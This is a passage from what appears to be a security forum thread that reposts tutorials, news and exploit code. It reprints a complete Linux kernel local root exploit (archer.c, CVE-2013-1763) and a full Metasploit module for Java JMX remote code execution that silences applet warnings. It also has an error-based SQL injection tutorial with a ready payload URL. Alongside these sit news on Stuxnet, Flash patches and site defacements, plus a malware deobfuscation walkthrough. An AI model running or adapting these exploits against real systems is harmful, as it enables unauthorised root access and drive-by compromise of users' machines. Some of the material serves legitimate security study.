and then get the result of the final query. Let’s try to understand it with an example. Select concat((select database())); In the above query, the blue part is the internal or sub query which gets evaluated first, and whose result is then passed to the concat function. This returns a string equivalent to the current selected database name which is then evaluated by the outer red colored Select keyword. This part evaluates a string (constant) which is actually name of the currently used database. SQL INJECTIONS In this type of query injections, we will be using specific functions available to the backend database. If you are not familiar with them, please look them up before proceeding. 1. Rand() 2. Floor() 3. Count() 4. Group by clause Some great researchers figured out that using Group by clause along with an aggregate function like count( * ) produced an error message dumping a part of the query as an error message, which henceforth evolved double query injections. Let us start with basic building blocks and proceed to build a complete and complex query. We will perform these experiments on the MySQL client and directly interact with the database to understand the concepts. #mysql -u root –p toor (toor is default password of the MySQL root account on backtrack; change it as per your deployment.) mysql> use security; – Name of our database mysql> SELECT concat((select database()));– Dumps out current database name as string mysql> SELECT concat(‘string1?,’string2?); – Dumps out the two strings as one big string. (Note: It does not matter if you use single quotes or double quotes to wrap your query. Now let us look at the functions mentioned above in the article. Mysql> Select rand(); – Returns a random value less than 1 every time it is run. Mysql> Select floor(1.1123456); – Returns an integer value and discards all decimal values by default. We can now group these functions together. mysql>SELECT floor(rand()*2); – Create a random value, multiply it by 2 and then floor it to get the result. This would be either 0 or 1. Try it couple of times and see for yourself. Now let us combine the things we learned so far to make some useful output. Let’s execute the following query: Mysql>SELECT CONCAT((SELECT database()), FLOOR(RAND()*2)); Analyzing the query: We have here a nested query in which we wrapped a query inside another one. When this query executes, it first evaluates SELECT DATABASE(), along with RAND()*2, whose output is used in FLOOR(), thereafter concatenating the output, giving a string which ends with 0 or 1. Now if we query this string against any standard database table from MySQL, it will return SECURITY0 or SECURITY1 randomly. Be the first to hear of new free tutorials, training videos, product demos, and more. We'll deliver the best of our free resources to you each month, sign up here: Now let’s add the GROUP BY function to the query. This time, let’s try to use information_schema.tables or information_schema.columns tables to dump the results. The columns table would dump some 100+ entries which are good to check the random output. This group by clause hands us the distinct entries from the column. mysql> select concat((select database()), floor(rand()*2))as a from information_schema.tables group by a; The label or alias “a” is added to display the Column name as “a” which can be referenced by GROUP BY Clause. IMPORTANT: Henceforth, the inner query SELECT database() can be replaced by any other query which we would like to get as a string output in MySQL error, such as SELECT version(), user(), datadir() or complete enumeration of the columns, tables or other databases as discussed in part 1. Time to get the magic going. mysql> select count( * ), concat((select database()), floor(rand()*2))as a from information_schema.tables group by a; Gets us an error which has our string as part of error: ERROR 1062 (23000): Duplicate entry ‘security1? for key ‘group_key’ Kudos again to all those brilliant minds who found the deadly combination of Aggregate function with Group by clause and the repeating values that makes a syntactically correct query which when executed produces a runtime error. Let us try to change the inner query to test something else. mysql> select count( * ), concat((select version()), floor(rand()*2))as a from information_schema.tables group by a; Some fancy inputs can be concatenated to distinguish a trailing 0 or 1 from our string. mysql> select count(*), concat(‘~’,(select user()),’~', floor(rand()*2))as a from information_schema.tables group by a; Error: ERROR 1062 (23000): Duplicate entry ‘~root@localhost~1? for key ‘group_key’ Let us try to implement this logic through the front end web application. But before we proceed there, we need to look at another aspect called Derived table. The complete query we used above to produce an error can be used as a table name in a query, something like: select 1 from (table name); Why we need to do this, you can easily follow the explanations from the video lessons below, which includes a complete walk through of this article: mysql> select 1 from (select count(*), concat(‘~’,(select user()),’~', floor(rand()*2))as a from information_schema.tables group by a)x; ERROR 1062 (23000): Duplicate entry ‘~root@localhost~0? for key ‘group_key’ http://localhost/sqli-labs/Less-5/?id=1?+AND+(select+1+from+(select+count( * ),+concat(‘~’,(select+user()),’~',+floor(rand()*2))as+a+from+information_schema.tables+group+by+a)x)–+ Replacing the internal query with what we want to extract gets us our output in the form of MySQL errors. Sursa: http://resources.infosecinstitute.com/double-query-injections-demystified/

[h=1]Stuxnet Missing Link Found, Resolves Some Mysteries Around the Cyberweapon[/h] By Kim Zetter 02.26.13 12:40 PM Iranian President Mahmoud Ahmadinejad touring the Natanz enrichment facility in April 2008 during the time that Stuxnet is already believed to have been unleashed on computers in Iran. Photo courtesy of the Iranian president’s office As Iran met in Kazakhstan this week with members of the UN Security Council to discuss its nuclear program, researchers announced that a new variant of the sophisticated cyberweapon known as Stuxnet had been found, which predates other known versions of the malicious code that were reportedly unleashed by the U.S. and Israel several years ago in an attempt to sabotage Iran’s nuclear program. The new variant was designed for a different kind of attack against centrifuges used in Iran’s uranium enrichment program than later versions that were released, according to Symantec, the U.S-based computer security firm that reverse-engineered Stuxnet in 2010 and also found the latest variant. The new variant appears to have been released in 2007, two years earlier than other variants of the code were released, indicating that Stuxnet was active much earlier than previously known. A command-and-control server used with the malware was registered even earlier than this, on Nov. 3, 2005. Like three later versions of Stuxnet that were released in the wild in 2009 and 2010, this one was designed to attack Siemens PLCs used in Iran’s uranium enrichment program in Natanz. But instead of changing the speed of spinning centrifuges controlled by the PLCs, as those later versions did, this one focused on sabotaging the operation of valves controlling the flow of uranium hexafluoride gas into the centrifuges and cascades — the structure that connects multiple centrifuges together so that the gas can pass between them during the enrichment process. The malware’s goal was to manipulate the movement of gas in such a way that pressure inside the centrifuges and cascade increased five times the normal operating pressure. “That would have very dire consequences in a facility,” says Liam O’Murchu, manager of security response operations for Symantec. “Because if pressure goes up, there’s a good chance the gas will turn into a solid state, and that will cause all sorts of damage and imbalances to the centrifuges.” The new finding, described in a paper released by Symantec on Tuesday (.pdf), resolves a number of longstanding mysteries around a part of the attack code that appeared in the 2009 and 2010 variants of Stuxnet but was incomplete in those variants and had been disabled by the attackers. The 2009 and 2010 versions of Stuxnet contained two attack sequences that each targeted different models of PLCs made by Siemens being used in Iran’s uranium enrichment plant — the Siemens S7-315 and S7-417 models of PLC. In these later variants of Stuxnet, however, only the 315 attack code worked. The 417 attack code had been deliberately disabled by the attackers and was also missing important blocks of code that prevented researchers from determining definitively what it was designed to do. As a result, researchers have long guessed that it was used to sabotage valves, but couldn’t say for certain how it affected them. There were also mysteries around why the attack code was disabled — was it disabled because the attackers had failed to finish the code or had they disabled it for some other reason? The 2007 variant resolves that mystery by making it clear that the 417 attack code had at one time been fully complete and enabled before the attackers disabled it in later versions of the weapon. And because the 2007 variant only contained the 417 attack code — with no code attacking the Siemens 315 PLC — it appears that the attackers disabled the 417 code in later versions because they wanted to change their tactics, dropping their focus on sabotaging the valves in order to focus instead on sabotaging the spinning centrifuges. Sursa[complet]: Stuxnet Missing Link Found, Resolves Some Mysteries Around the Cyberweapon | Threat Level | Wired.com

[h=2]Black hat greed reducing software vulnerability report rate[/h] Zero-day market temptation: Cash out or collaborate? By Iain Thomson in San Francisco RSA 2013 HP has kicked off the round of reports that accompany each RSA conference with its analysis of security vulnerabilities, and has revealed that although the overall trend is positive, the growing market for zero-day flaws is reducing the number of the most serious problems that are disclosed. The long-term trend looks pretty good, but... The number of software vulnerabilities has continued its overall downward trend from its 2006 peak, but while the numbers of the most critical threats hasn't fallen much, HP researchers have seen a reduction in the number of serious vulnerabilities that are actually reported. HP attributes that slippage to the growing market for vulnerability data. "We think a lot of these vulnerabilities are being sold in the black market or the grey one," Mark Painter, marketing manager for Fortify HP enterprise security, told The Register. "The growth of the grey market and the worth of vulnerabilities in dollars must have a reducing effect on the number of public disclosures that we see," Painter told us. "Those dollars are there, and anything that goes down [the grey channel] doesn't become public." Four of the six most common vulnerabilities are aimed primarily or solely at web applications: SQL injection, cross-site scripting, cross-site request forgery, and remote file inclusion. Together these account for 4 per cent of the total. On the mobile front, the HP team tested a very small sample of 70 apps and found a host of problems. Over 37 per cent of applications had passwords that could be beaten using basic methods (such as Apple's latest passcode-bypass woes), and 77 per cent had information-leakage flaws. There was a relatively low rate for XSS vulnerabilities in mobile, with an unlucky 13 per cent of mobile apps at risk, but the data showed a worrying preponderance of financial and database management apps in the sample. Elsewhere, HP reported a huge increase in the number of SCADA (supervisory control and data acquisition) vulnerabilities detected, the numbers of which have risen 68 per cent over the last five years. This likely reflects that people are more actively looking for such things post-Stuxnet, rather than any inherent instability in SCADA code. ® Sursa: Black hat greed reducing software vulnerability report rate • The Register

[h=2]Adobe squashes TWO critical Flash vulnerabilities with emergency patches[/h] Two out of three threats are dangerous, being used in wild By Jack Clark in San Francisco Adobe published a critical Flash Player update on Tuesday to fix three exploits, two of which are under active attack by hackers. Two of the three vulnerabilities are being used by nefarious folk, Adobe said, and one of these two explicitly targets the Firefox browser. Adobe introduced the Flash Player sandbox a year ago to protect Firefox users from vulnerabilities in Flash. It appears this is now being targeted for permission escalation attacks. "Adobe is aware of reports that CVE-2013-0643 and CVE 2013-0648 are being exploited in the wild in targeted attacks designed to trick the user into clicking a link which directs to a website serving malicious Flash (SWF) content," the company wrote in a security bulletin. Adobe classified the update with a priority rating of 1 (do it now if you value your computer) for Windows and Macintosh systems, and 3 (install at your discretion) for Linux kit. Google and Microsoft are applying automatic fixes to the integrated Adobe Flash Player code found in Chrome and in Internet Explorer 10 for Windows 8. The updates resolve a permissions issue with the Flash Player Firefox sandbox (CVE-2013-0643), a vulnerability in the ExternalInterface ActionScript feature (CVE-2013-0648), and a buffer overflow vuln in the Flash Player broker service (CVE-2013-0504). Links to download the fix are available from Adobe's website, as listed in the security bulletin. The timing of the patch jars with Adobe's as-of-November-2012 commitment to try and issue security patches in a more measured pattern that coincides with Microsoft's Patch Tuesday. ® Sursa: Adobe squashes TWO critical Flash vulnerabilities with emergency patches • The Register

Kernel Attacks Through User-Mode Callbacks Authored by Tarjei Mandt In this paper, the author discusses the many challenges and problems concerning user-mode callbacks in win32k. In particular, they show how win32k's dependency on global locks in providing a thread-safe environment does not integrate well with the concept of user-mode callbacks. Although many vulnerabilities related to user-mode callbacks have been addressed, their complex nature suggests that more subtle flaws might still be present in win32k. Thus, in an effort to mitigate some of the more prevalent bug classes, they conclusively provide some suggestions as to how users may protect themselves against future kernel attacks Download: http://dl.packetstormsecurity.net/papers/win/mandt-win32k-paper.pdf Sursa: Kernel Attacks Through User-Mode Callbacks ? Packet Storm

Today the vast majority of ATMs worldwide use a Microsoft Windows OS, primarily Windows XP Professional or Windows XP Embedded.[citation needed] A small number of deployments may still be running older versions of Windows OS such as Windows NT, Windows CE, or Windows 2000. Automated teller machine - Wikipedia, the free encyclopedia

[h=1]Atac cibernetic asupra a 60 de siteuri din Romania de un hacker sirian[/h] [h=3]Un hacker din Siria a atacat cibernetic peste 60 de site-uri române?ti, din motive politice.[/h] Omar Salloum, sau Syrian StOrm (Furtuna Sirian?) cum se intituleaz? pe Facebook, s-a autodenun?at pe re?eaua de socializare c? a spart (a hackuit) peste 60 de siteuri din România, aparent aleatoare, sup?rat fiind de pozi?ia politic? a Guvernului României fa?? de ?ara sa. Guvernul României condamn? recentele ac?iuni agresive ale Siriei ?i este de p?rere c? se încalc? dreptul interna?ional ?i este pus? în pericol stabilitatea ?i securitatea regional?. România are de partea ei Turcia, care împarte acelea?i opinii politice. Presa interna?ional? sus?ine faptul c? acest conflict din Siria este alimentat ?i organizat de for?e str?ine, cu ajutorul "terori?tilor" care colaboreaz? cu re?eaua Al-Qaida, afirm? pre?edintele sirian, Bashar al-Assad, în primul discurs televizat din ultimele trei luni, informeaz? Mediafax. Iat? care sunt site-urile care au fost h?ckuite de sirian: .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. Valcea 1 - Televiziunea de Valcea GAL Valea Tutovei si Zeletinului | Just another WordPress site .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. WileyX Romania Servicii psihoterapie Iasi .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. http://valseb.ro/ Hosting account suspended Usi Porta Doors .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. Lisa Shop | Lisa Accessories Lifecoaching, Simon Eniko, trainer, curs reiki, pictura pe matase Actualitatea Online | Saptamanal pentru oameni inteligenti | Lugoj .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. ArhivaFoto.ro - Banca de fotografii http://primarianecsesti.ro/ Pronosticuri sportive profesioniste .:: Hacked by Th3 Syrian St0rm ::. V for Verde — Bucur?-te de via??! .:: Hacked by Th3 Syrian St0rm ::. http://tryonemanshow.eu/ Unitate In Romania .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. http://uberuan.ro/ .:: Hacked by Th3 Syrian St0rm ::. Transport MVO Avocat Eugen Preda is coming soon Hosting account suspended http://vorwerk-thermomix.ro/ http://bionek.ro/ thermomix ... site-ul oficial thermomix - Romania http://terapieacasa.ro/ http://terapia-naturista.ro/ Centrul Vywamus Romania Hosting account suspended Mesaje de dragoste,iubire,noapte buna,la multi ani etc. http://regen.ro.im/ http://steauadiminetii.ro/ .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. Totul despre stil .:: Hacked by Th3 Syrian St0rm ::. .:: Hacked by Th3 Syrian St0rm ::. Home: www.denic.de .:: Hacked by Th3 Syrian St0rm ::. SkirtBike Baia Mare - Nu va plangeti de stire, vine de la Atac cibernetic asupra a 60 de siteuri din Romania de un hacker sirian Si mai ciudat e ca am gasit-o via ProSport

Archlinux: // archer.c // // 2012 sd@fucksheep.org // // Works reliably against x86-64 3.3-3.7 arch. // // Tested against: // // Linux XXX 3.3.1-1-ARCH #1 SMP PREEMPT Tue Apr 3 06:46:17 UTC 2012 x86_64 GNU/Linux // Linux XXX 3.4.7-1-ARCH #1 SMP PREEMPT Sun Jul 29 22:02:56 CEST 2012 x86_64 GNU/Linux // Linux XXX 3.7.4-1-ARCH #1 SMP PREEMPT Mon Jan 21 23:05:29 CET 2013 x86_64 GNU/Linux // ... #include <assert.h> #define JUMP 0x0000100000001000LL #define BASE 0x380000000 #define SIZE 0x010000000 #define KSIZE 0x2000000 static long ugid; void patch_current() { int i,j,k; char *current = *(char**)(((long)&i) & (-8192)); long kbase = ((long)current)>>36; for (i=0; i<4000; i+=4) { long *p = (void *)&current[i]; int *t = (void*) p[0]; if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue; for (j=0; j<20; j++) { for (k = 0; k < 8; k++) if (((int*)&ugid)[k%2] != t[j+k]) goto next; for (i = 0; i < 8; i++) t[j+i] = 0; for (i = 0; i < 10; i++) t[j+9+i] = -1; return; next:; } } } int main() { long u = getuid(); long g = getgid(); int i, f = socket(16,3,4); static int n[10] = {40,0x10014,0,0,45,-1}; assert(mmap((void*)(1<<12), 1<<20, 3, 0x32, 0, 0)!=-1); setresuid(u,u,u); setresgid(g,g,g); ugid = (g<<32)|u; memcpy(1<<12, &patch_current, 1024); for (i = 0; i < (1<<17); i++) ((void**)(1<<12))[i] = &patch_current; send(f, n, sizeof(n), 0); setuid(0); return execl("/bin/bash", "-sh", 0); } Sursa: oss-sec: Archlinux/x86-64 3.1.x-3.7.x x86-64 CVE-2013-1763 sock_diag_handlers[] warez

Discover Contacts And Domains With Recon-ng Automation is really important in penetration testing engagements because it can help the penetration tester to save time and to give more attention to other activities.For that reason many pen testers are putting effort to build tools to assist them with a variety of tasks.Such a tool is the recon-ng which can perform web-based reconnaissance and it can be used in social engineering engagements or for extracting information that exists on the web.In this article we will examine how we can use the Recon-Ng framework to discover different type of information. We can type help in the framework in order to see a list with all the available commands. recon-ng – commands We can see that there is a command named modules.We will type that command to check the existing modules that we can use.In the next image you can see a sample of the available modules. recon-ng – sample of the available modules There is a module called contacts_jigsaw.Jigsaw is a website similar to Linkedin that contains a large database of business contacts.So let’s say that we want to discover the contacts of a company that exists on jigsaw.We will load the module with the command load contacts_jigsaw and we will set the domain of our preference. load jigsaw module in the next image we can see a sample of the output: recon-ng – Gathering Contacts Now that we have some contacts we can try to use the Google module to discover additional domains of the same company. discover hosts via google In the image below we can see a sample of the results that recon-ng has produced. Discovering subdomains with recon-ng Recon-ng gives us also the ability to extract the results in CSV format or in an HTML file. Save the results in HTML file You can see in the next two images the output of the report: recon-ng – Report recon-ng report contacts Conclusion Recon-ng is a great framework that can help in the information gathering stage of a penetration test.This tool is really simple to use and it holds every result in its database for later use.The report that generates is well formatted and if in the future additional modules will added on the framework then it will included in every penetration tester toolkit. Sursa: Discover Contacts And Domains With Recon-ng | Penetration Testing Lab

[h=1]Java Applet JMX Remote Code Execution[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :javascript => false }) def initialize( info = {} ) super( update_info( info, 'Name' => 'Java Applet JMX Remote Code Execution', 'Description' => %q{ This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in February of 2013. Additionally, this module bypasses default security settings introduced in Java 7 Update 10 to run unsigned applet without displaying any warning to the user. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Vulnerability discovery and exploit in the wild 'Adam Gowdiak', # Vulnerability discovery 'SecurityObscurity', # Exploit analysis and deobfuscation 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2013-0431' ], [ 'OSVDB', '89613' ], [ 'BID', '57726' ], [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-8.pdf' ], [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-9.pdf' ], [ 'URL', 'http://security-obscurity.blogspot.com.es/2013/01/about-new-java-0-day-vulnerability.html' ], [ 'URL', 'http://pastebin.com/QWU1rqjf' ], [ 'URL', 'http://malware.dontneedcoffee.com/2013/02/cve-2013-0431-java-17-update-11.html' ] ], 'Platform' => [ 'java', 'win', 'osx', 'linux' ], 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { 'Platform' => ['java'], 'Arch' => ARCH_JAVA, } ], [ 'Windows x86 (Native Payload)', { 'Platform' => 'win', 'Arch' => ARCH_X86, } ], [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } ], [ 'Linux x86 (Native Payload)', { 'Platform' => 'linux', 'Arch' => ARCH_X86, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 19 2013' )) end def on_request_uri(cli, request) print_status("handling request for #{request.uri}") case request.uri when /\.jar$/i print_status("Sending JAR") send_response( cli, generate_jar, { 'Content-Type' => "application/octet-stream" } ) when /\/$/ print_status("Sending HTML") send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' }) else send_redirect(cli, get_resource() + '/', '') end end def generate_jar paths = [ [ "Exploit.ser" ], [ "Exploit.class" ], [ "B.class" ] ] p = regenerate_payload(cli) jar = p.encoded_jar paths.each do |path| 1.upto(path.length - 1) do |idx| full = path[0,idx].join("/") + "/" if !(jar.entries.map{|e|e.name}.include?(full)) jar.add_file(full, '') end end fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "cve-2013-0431", path ), "rb") data = fd.read(fd.stat.size) jar.add_file(path.join("/"), data) fd.close end return jar.pack end def generate_html html = <<-EOF <html> <script language="Javascript"> var _app = navigator.appName; if (_app == 'Microsoft Internet Explorer') { document.write('<applet archive="#{rand_text_alpha(4+rand(4))}.jar" object="Exploit.ser"></applet>'); } else { document.write('<embed object="Exploit.ser" type="application/x-java-applet;version=1.6" archive="#{rand_text_alpha(4+rand(4))}.jar"></embed>'); } </script> </html> EOF return html end end Sursa: Java Applet JMX Remote Code Execution

Cracking the Defender: The Deobfuscated Code Dejan Lukan February 25, 2013 Introduction So far we’ve taken a look at the obfuscation routine and how it deobfuscates the instructions in the loc_4033D1. At the beginning point, the overview navigator will look like it shown on the picture below: Upon executing the program, new functions will be discovered because the code is deobfuscated. The new overview navigator will look like this: We can see that there are additional blue regions that correspond to functions. Additionally, there is also more instructions (brown area) rather than data items (grey area); this is because the data instructions were changed into the code instructions as a result of a code deobfuscation. We’ve also already determined that the deobfuscated instructions are from 0x004034DD – 0x004041FD with occasional data elements. Analyzing Deobfuscated Code The first instructions of the deobfuscated code are presented on the picture below: The first instruction loads the previously saved base address of the ntdll.dll library into register eax and then stores it at stack the offset location [ebp – 50]. The same value 0x7C900000 is then stored into the ecx register and the value stored at [0x7C90003C] is added to 0x7C900000. Let’s take a look at which value is located at the address 0x7C90003C; we can see that on the picture below: it’s 0x000000D0. So the value in the ecx register that’s later stored at the [ebp-58] is 0x7C9000D0. What just happened? It appears that the program has just read some value from the ntdll.dll library’s header (notice the “This program cannot be run in DOS mode” on the picture above – this is a clear indication that we’re looking at the PE executable file: either exe or dll: in this case this is ntdll.dll DLL file). Then we can also apply the IMAGE_DOS_HEADER to the ntdll.dll. We can do that by first going to the Structures window and pressing the Insert key, which will open the following pop-up dialog: We need to click on the “Add standard structure” button and select the IMAGE_DOS_HEADER structure, as seen on the picture below. After adding that structure, we can apply it to the various memory locations in Ida’s database. Now we need to apply that structure to the base address of the ntdll.dll file by going to its base address 0x7C900000 and clicking on the Edit – Struct var, selecting IMAGE_DOS_HEADER and pressing OK. After that, we must also expand the structure at the 0x7C900000 location by pressing the ‘+’ key. The applied structure can be seen on the picture below: Now the values in the structure have comments that correspond to the actual members of the structure; we no longer only have some bytes that don’t mean anything, but have the comments appended and we immediately know what each byte means. Let’s also take a look at the corresponding bytes, presented in the hex view: We can see that the bytes in the hex view and in the disassembly view are exactly the same. We must keep in mind that the db means 1 byte, dw 2 bytes and dd 4 bytes. The only weird thing is the “dw 4 dup(0)”, which means that we’re operating with an array that has 4 elements all initialized at 0 and every element is 2 bytes in size (hence the dw); this means that the total size of the array is 8 zero bytes. If we calculate the bytes from the hex view, we can see that their number actually corresponds to the disassembly view. The bytes that we’re interested at address 0x7C90003C, which are the “dd 0D0h” bytes, means that we have 4 bytes where 3 bytes are 0×00 and the last byte is 0xD0. These bytes correspond to the e_lfanew entry in the DLL header. If we Google what this field means, we’ll find an explanation that the e_lfanew is a 4-byte offset into the file where the PE file header is located. This field is used to find the PE file header in the DLL file, which occurs soon after that MSDOS header. We’ve just found out that the PE header is located at the offset 0×30, which means that we can apply the IMAGE_NT_HEADERS structure the same way as we did before with the IMAGE_DOS_HEADER structure to the address 0x7C9000D0. If we do that we’ll get the following comments which explain the PE header structure in detail: So the initial code segment, located at address 0x004034E5, is loading the address of the PE header of the ntdll.dll file into the register ecx and later to the [ebp-58h] location. Let’s present the picture again, just to be clear about that. Now let’s take a look at the next piece of code presented on the picture below: We can see that we’re loading the address 0x7C9000D0 into register eax and address 0x7C900000 into register ecx and then adding the value stored at address 0x7C9000D0+0×78 to the ntdll base address. The actual address we’re accessing is the 0x7C900148. That address is presented on the picture below (never mind that the actual address isn’t right, this is just how Ida presents the addresses where we’ve applied structures too: all have the same address as the base address of the structure): This means that we’re adding the value 0×3400 to the value 0x7C900000, which makes the 0x7C903400 address. After that, we’re also storing the same value into the [ebp-48h] and into the eax register. The next thing that happens is we’re adding the value at 0x7C903420 to 0x7C900000 and storing the result into ecx. The value at 0x7C903420 address holds the value 0x48B8, which is presented below: This means that we’re storing the value 0x7C9048B8 into the [ebp-4Ch]. In the next step, we’re also reading the value 0×3428 from the picture above and storing the address 0x7C903428 it into the [ebp-54h]. Here we can see that we’re comparing the value from [ebp-6Ch] to the 0x39DBA17A constant. If the value is not equal, we’re jumping to loc_4035F1, which consequentially jumps back to loc_40352D. The value in the [ebp-6Ch] is being calculated right before that code, and is presented on the picture below: We can see that we’re taking the value from [ebp-68h], decreasing it by 1 and storing it at the same location. When that location contains the value 0, we’re breaking out of the loop and jumping to the loc_4035D0 location, which was presented on the previous picture that compares the value at [ebp-6Ch] to constant 0x39DBA17A. We won’t go into details about this function, but we must keep in mind that this is the function that calculates the checksum of the ntdll’s export function and then compares it to the 0x39DBA17A constant below. Rather than evaluating this instruction by instruction, we can set the breakpoint at the 0x004035E9 instruction, which calculated the exact address of the function we’re looking for and is only accessible when the checksum matches. The picture below presents the registers after executing that instruction: It’s clear from the picture above that the program calls the NtAllocateVirtualMemory function from the ntdll.dll library file. The address of that function is stored at the [ebp-10h], which is later called at the 0x0040367C address: “0040367C call dword ptr [ebp-10h]“. The code that follows copies the ntdll file into the previously reserved address space in memory and then calls the function sub_4030E5, which we can see on the picture below: The sub_4030E5 Function Let’s analyze the sub_4030E5 function just for the fun of it. Let’s present the start of the disassembly instructions of that function: The function is first creating a new stack frame and reserving 0×310 bytes for the local variables. After that, we’re entering a very interesting loop, as can be seen on the picture below: With the jz instruction we’re jumping to the “mov esi, edx” instruction, which stores the value from register edx into register esi. But the important thing is what happens next; we comparing the value in esi with the constant 0x190BC2. If the values are equal, we’re ending the loop and moving on with the program execution. Otherwise, we’re continuing the execution of the loop. First, we’re adding the constant 8 to the address in the ecx register and reading the value from that address into register esi, then comparing that value with the value in ebx. When entering that block for the first time, the ecx register contains the value 0x087E0000. This is why we’re actually reading the value from the address 0x087E0008 and other consecutive addresses. The values at those addresses are presented on the picture below: The ebx register contains the value 0×00000000, which means that we’ll be reading every other value from address 0x087E0008 onwards until reading the value 0x00190BC2 or reaching the end of the data structure (the 0×00000000 value). If we place a breakpoint on the address 0x0040311E and run the program, the breakpoint will be hit right at the moment when the value at the address stored in register ecx matches the 0x00190BC2 constant. When that happens, the value in ecx register is 0x087E0420. If we take a look at the memory address,, we can see that this is truly the case: What’s happening in this case is that the program is going through the export table of the ntdll.dll library trying to match the checksum of a function with constant 0x00190BC2. Here we’re reading the next 4 bytes from the currently found address into register ecx. This means that the register ecx will contain the value 0x0000C1AE (take a look at the previous image where we’ve dumped the memory). This is also the reason why we’ve been reading every other 4 bytes and leaving the middle four bytes alone when matching the checksum; I guess the middle 4 bytes hold some specific information regarding the previous checksum value, so that every checksum value has it’s corresponding additional 4 bytes used for something which we currently don’t know yet. Then we’re adding the value in register edi to the value in register ecx and storing the value on the stack at offset [ebp+var_C]. Later, in the same function, we’re calling this value, which means that we’ve probably calculated some kind of address. If we place a breakpoint to that function and run the program, the breakpoint is hit right at the moment where we can step into the function being called. When we step into the function, we’re actually executing the following code: We’re pushing the value 0x00156DC5 to the stack and returning to that function. The function then starts… as presented on the picture below: We won’t go into details what this function does; let’s just say that it calls multiple functions, which we’ll take a look at here. The function calls the following functions: debug006:00156DD0 call near ptr unk_151EDF debug006:00156DED call off_174998 debug006:00156E09 call near ptr unk_16C977 debug006:00156E6D call off_174990 Let’s take a look at the code of every single function call. First, we have the function at address 0x00151EDF. Its code is presented below: We can see that function does nothing special; it just initialized the stack for the function call to data cross-reference off_141280 that holds the value of the kernel32_WaitForSingleObject function: If we step into the function, it’s clear that the function WaitForSingleObject from the kernel32 DLL is being called. This can be seen on the picture below: Let’s continue to the next function at address 0×00174998, where it’s immediately evident that the NtQueryInformationProcess function is being called: If we step into the function at address 0x7C90D808, it’s clear that the KiFastSystemCall function is being called, as seen on the picture below: We can see that we’re moving the value of esp into the register edx. The registers, before executing the sysenter instruction, are presented below: Be the first to hear of new free tutorials, training videos, product demos, and more. We'll deliver the best of our free resources to you each month, sign up here: Upon stepping into the sysenter instruction, we’re immediately taken to the previously called function, which is NtQueryInformationProcess. You can see that on the picture below (notice the EIP pointing at the retn instruction after the function call): Let’s take a look at the next function call at address 0x0016C977. The code at that function is too big to fit it into a picture, which is why I’m presenting only the function calls at that function, which can be seen below: debug006:0016C977 ; --------------------------------------------------------------------------- debug006:0016C977 debug006:0016C977 loc_16C977: ; CODE XREF: debug006:00156E09#p debug006:0016C984 call off_141270 debug006:0016C99F call off_1411D8 debug006:0016C9B5 call off_141214 debug006:0016C9C0 call off_1412BC debug006:0016C9CA leave debug006:0016C9CB retn 4 The call to off_141270 causes subsequent calls to the following functions: kernel32_CreateToolhelp32Snapshot, kernel32_GetCurrentProcessId, kernel32_CloseHandle and others. The call at off_1411D8 causes the program to call kernel32_Thread32First. Finally, the call at off_1412BC causes the program to call kernel32_CloseHandle. The function call at off_174990 calls the instructions presented on the picture below: This essentially calls the function loc_7C90D1B8 presented below: And those instructions then call the KiFastSystemCall presented on the picture below: Conclusion We’ve seen how to deobfusate the obfuscated code in Ida and presented the way how to apply various structures to the executable, which may come in handy if the malware is trying to grab some value from the executable PE header. We’ve also taken a look at the sub_4030E5 function that calls various system functions in the kernel32.dll library. Sursa: InfoSec Institute Resources – Cracking the Defender: The Deobfuscated Code

February 2013 Internet Explorer updates Today we released two critically rated bulletins and one security advisory for Internet Explorer. Microsoft Security Bulletin MS13-009- Critical This security update resolves thirteen privately reported vulnerabilities in Internet Explorer. The most severe vulnerabilities could allow remote code execution if a user views a specially crafted Web page using Internet Explorer. An attacker who successfully exploited these vulnerabilities could gain the same user rights as the current user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. This security update is rated Critical for Internet Explorer 6, Internet Explorer 7, Internet Explorer 8, Internet Explorer 9, and Internet Explorer 10 on Windows clients and Moderate for Internet Explorer 6, Internet Explorer 7, Internet Explorer 8, Internet Explorer 9, and Internet Explorer 10 on Windows servers. For more information, please see the full bulletin. Microsoft Security Bulletin MS13-010 – Critical This security update resolves a privately reported vulnerability in the Microsoft implementation of Vector Markup Language (VML). The vulnerability could allow remote code execution if a user viewed a specially crafted Web page using Internet Explorer. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. This security update is rated Critical for Internet Explorer 6, Internet Explorer 7, Internet 